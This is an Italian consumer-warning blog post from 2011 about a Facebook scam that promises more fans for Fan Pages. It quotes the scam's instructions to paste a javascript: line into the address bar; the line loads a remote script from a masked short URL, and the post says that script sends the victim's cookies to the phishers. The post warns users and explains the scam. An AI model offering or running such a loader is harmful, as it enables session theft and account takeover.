sabato 12 febbraio 2011

Presunti hacker rumeni rubano pagine su Facebook, cosa c'è di vero


Molti utenti continuano a lamentarsi perchè vengono sottratte loro (in modo più o meno truffaldino) le Pagine Fan delle quali sono amministratori. Oltre all'utilizzo del phishing, cioè quella frode online ideata per sottrarre con l’inganno le credenziali di accesso ai profili Facebook, vi abbiamo già segnalato altri metodi che fanno leva sull'ingenuità degli utenti. E su Facebook in queste ore si sta diffondendo una notizia quanto mai allarmante, che riguarda il presunto furto di Fan Page da parte di sedicenti 'hackers rumeni'. Qualcosa di vero in fondo c'è, ma naturalmente non viene spiegato in che modo questi aggirebbero. Il  metodo viene proposto da alcune pagine (che supponiamo di origine albanese in base alla lingua rilevata) che riportano impropriamente il logo di Facebook e che spiegano come moltiplicare il numero di fan delle proprie pagine.


In una delle pagine che abbiamo analizzato ecco cosa leggiamo

Menyra e duhur per te shtuar fansat ne faqen tuaj ....per gjithe adminat e faqeve ...ja menyra e duhur...

1- beni copy kete kodin

javascript:(a = (b = document).createElement("script")).src = "http://bit.ly/******", b.body.appendChild(a); void(0)

2-Fshini URL siper ku shkruan www.facebook.com/...
dhe beni paste kodin e kopjuar

3-Prisni derisa te sec sa te dali tabela e konfirminit dhe shtypni OK ....

che tradotto da albanese a italiano:

Il modo giusto per aggiungere fan al tuo sito .... per tutte le pagine ... aggiungi qui la strada giusta ...

1 - Fare copia questo codice

javascript: (a = (b = documento) createElement ("script").) b.body.appendChild src = "http://bit.ly/******" (a):. void (0)

URL 2-Elimina sopra dove www.facebook.com/ scrive ...
e fai copia incolla il codice

3-Attendere che venga esteso per la conferma e premere OK ....


Premettendo che i codici Javascript che girano sul Web per "suggerire" le vostre pagine Facebook ad altri utenti possono risultare pericolosi, in qualunque caso la funzione è stata disattivata e dunque si tratta d'una truffa. In questo caso si viene indirizzati ad una pagina Web - il cui indirizzo è nascosto da un'indirizzo accorciato (short url) - dove si trova l'intero codice Javascript. Nelle istruzioni leggiamo che bisogna cancellare l'indirizzo www.facebook.com  nella barra degli indirizzi del browser e sostituirlo con lo stesso codice. Di seguito il codice che abbiamo rilevato sulla pagina Web nascosta nello short Url.


Tale operazione in realtà non avrà l'esito di aumentare i fan della vostra pagina, bensì nasconde il comando per inviare all'indirizzo al quale fà riferimento la pagina di phishing, anche i vostri cookie (codice http). Si tratta di procedure che permettono di rilevare i cookie attivi e inviarli a chi gestisce la pagina. Gli javascript vengono utilizzati per ottenere una maggiore interattività delle pagine web, ma sempre più spesso diventano veicolo di malware e in questo caso di phishing. Numerosi sono gli utenti caduti in questo tranello e qualcuno ha pure lasciato un commentato su una delle pagine truffa.


I cookie http sono usati per eseguire autenticazioni e tracking di sessioni e memorizzare informazioni specifiche riguardanti gli utenti che accedono al server, come ad esempio i siti preferiti. Ricordiamo che nei cookie sono inoltre memorizzate le credenziali di accesso ai vostri profili. Il consiglio è quello di non utilizzare alcun codice e di avvertire i vostri amici. Se siete caduti nella trappola modificate la vostra password di accesso al social network. Inoltre segnalate la pagina che vi ha arrecato danno a Facebook attraverso l'apposito pulsante. Ricordiamo a tal proposito che non vi sono altri form preposti alla segnalazione di pagine che non siano inserzioni pubblicitarie su Facebook, come invece erroneamente alcune pagine continuano a consigliare per segnalare eventuali scorrettezze al team di sicurezza del social network.

Nessun commento:

Posta un commento